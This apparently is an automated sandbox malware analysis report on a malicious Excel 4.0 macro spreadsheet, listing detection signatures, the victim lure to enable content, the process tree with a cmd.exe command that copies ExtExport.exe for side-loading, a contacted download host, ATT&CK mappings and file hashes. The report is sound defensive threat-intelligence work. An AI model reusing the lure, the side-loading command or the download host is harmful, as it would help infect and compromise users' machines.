Loading ...

Play interactive tourEdit tour

Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:document-47-2637.xls
Analysis ID:432941
MD5:92dcc47a1a044fc3a2328ec6eef3918b
SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2536 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • nnAzot.exe (PID: 2380 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: 7F7F391491C315A4A72EFCAC0D34FA93)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1204, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, ProcessId: 2536

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: document-47-2637.xlsVirustotal: Detection: 26%Perma Link
Source: document-47-2637.xlsMetadefender: Detection: 22%Perma Link
Source: document-47-2637.xlsReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source: Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2097222349.00000000003A1000.00000020.00020000.sdmp, nnAzot.exe.3.dr

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: webhub365.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.244.146.96:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.244.146.96:443
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: unknownDNS traffic detected: queries for: webhub365.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49167 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" and then click "Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35
Source: Screenshot number: 4Screenshot OCR: Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 .I lj 38 , Id q p
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: document-47-2637.xlsInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: document-47-2637.xlsInitial sample: Sheet size: 14533
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeMemory allocated: 76D20000 page execute and read and write
Source: Joe Sandbox ViewDropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/14@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\C7DE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0C6.tmpJump to behavior
Source: document-47-2637.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\System32\cmd.exeConsole Write: ..................nJ............ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d..........W.v............P.......(.......6.........nJ.........^..
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: document-47-2637.xlsVirustotal: Detection: 26%
Source: document-47-2637.xlsMetadefender: Detection: 22%
Source: document-47-2637.xlsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source: Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2097222349.00000000003A1000.00000020.00020000.sdmp, nnAzot.exe.3.dr
Source: document-47-2637.xlsInitial sample: OLE indicators vbamacros = False
Source: document-47-2637.xlsInitial sample: OLE indicators encrypted = True
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4F09 push ecx; ret
Source: C:\Windows\System32\cmd.exeFile created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeJump to dropped file
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A230E LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: document-47-2637.xlsStream path 'Workbook' entropy: 7.97723236264 (max. 8.0)
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4BBA SetUnhandledExceptionFilter,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4F4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4DF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A47E2 GetVersionExA,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Application Shimming1Process Injection1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting2Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
document-47-2637.xls26%VirustotalBrowse
document-47-2637.xls23%MetadefenderBrowse
document-47-2637.xls15%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%VirustotalBrowse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe2%MetadefenderBrowse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
webhub365.com0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
webhub365.com
198.244.146.96
truefalseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
198.244.146.96
webhub365.comUnited States
18630RIDLEYSD-NETUSfalse

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:432941
Start date:11.06.2021
Start time:00:00:08
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:document-47-2637.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.evad.winXLS@5/14@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 88.6%)
  • Quality average: 72.3%
  • Quality standard deviation: 34.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.17.254, 8.238.28.126, 8.238.36.254, 8.238.85.126, 8.241.78.126
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
198.244.146.96document-47-2637.xlsGet hashmaliciousBrowse
    document-47-2637.xlsGet hashmaliciousBrowse

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      webhub365.comdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      RIDLEYSD-NETUSdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      document-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      7dcce5b76c8b17472d024758970a406bdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
      • 198.244.146.96
      WV Northern Community College.docxGet hashmaliciousBrowse
      • 198.244.146.96
      Tax Folder.docGet hashmaliciousBrowse
      • 198.244.146.96
      51564.docxGet hashmaliciousBrowse
      • 198.244.146.96
      f.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      P.I-84514.docGet hashmaliciousBrowse
      • 198.244.146.96
      P.I-84512.docGet hashmaliciousBrowse
      • 198.244.146.96
      swift_euro.docxGet hashmaliciousBrowse
      • 198.244.146.96
      xTnb7uPpSb.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      Y8bVoElk4Y.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      xTnb7uPpSb.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      statistic-608048546.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsxGet hashmaliciousBrowse
      • 198.244.146.96
      cryptowall.exeGet hashmaliciousBrowse
      • 198.244.146.96
      invoice-H9247.docxGet hashmaliciousBrowse
      • 198.244.146.96
      T3ZhUk5pyO.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      Invoice.xlsmGet hashmaliciousBrowse
      • 198.244.146.96
      Prudential Investment Services.docGet hashmaliciousBrowse
      • 198.244.146.96
      Donation Receipt 36561536.docGet hashmaliciousBrowse
      • 198.244.146.96

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\aZ8ThU0Y\ERdZMUem\nnAzot.exedocument-47-2637.xlsGet hashmaliciousBrowse
        document-37-1849.xlsGet hashmaliciousBrowse

          Created / dropped Files

          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):893
          Entropy (8bit):7.366016576663508
          Encrypted:false
          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
          Malicious:false
          Reputation:high, very likely benign file
          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):328
          Entropy (8bit):3.1225789902305854
          Encrypted:false
          SSDEEP:6:kKLgNie8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:D78kPlE99SNxAhUe3OMx
          MD5:9332649BE2B7EEB84D2A51B4FCB8C610
          SHA1:EC5B37F58C8810F61A0978167001D6CAEE4CF14D
          SHA-256:B818B209B0885F643CECD70C1447B3D3C4547F7C7D2884195D19E2AFFC81A42D
          SHA-512:EB42861F3768F3B86281BBDB86702AA552E46F6CD4B38C215545ADFF820B905ED61B45B40C49B8B97EBF65462F796DA4EE5707F3B241CD24F9033858DA8AA2BE
          Malicious:false
          Reputation:low
          Preview: p...... ..........r~.^..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):252
          Entropy (8bit):3.0169823334697616
          Encrypted:false
          SSDEEP:3:kkFkluAVfllXlE/JADkdllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yWJ/fdl/:kKWYADk5liBAIdQZV7QWB
          MD5:5604964BDBEBD78FC30DCCFE0D288FBC
          SHA1:CFB823EC2DC190DB7B1B6273EA727DBE29968A9D
          SHA-256:B7C960629B8D092922FC3F8FAEEC71203CA8F0576026D3167745439AA3108D72
          SHA-512:1499517A5F36BBFE8FE8D4460FCD94564DD6DD53610207A9B715F81BDC504CE306E65246668BABAEC6C3694D300CFBBB4DFAEE48E21E43EE8194083EE2A0F5E8
          Malicious:false
          Reputation:low
          Preview: p...... ....`... G0~.^..(....................................................... .........e..S......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.3.6.7.2.e.8.3.f.1.4.0."...
          C:\Users\user\AppData\Local\Temp\CabE004.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
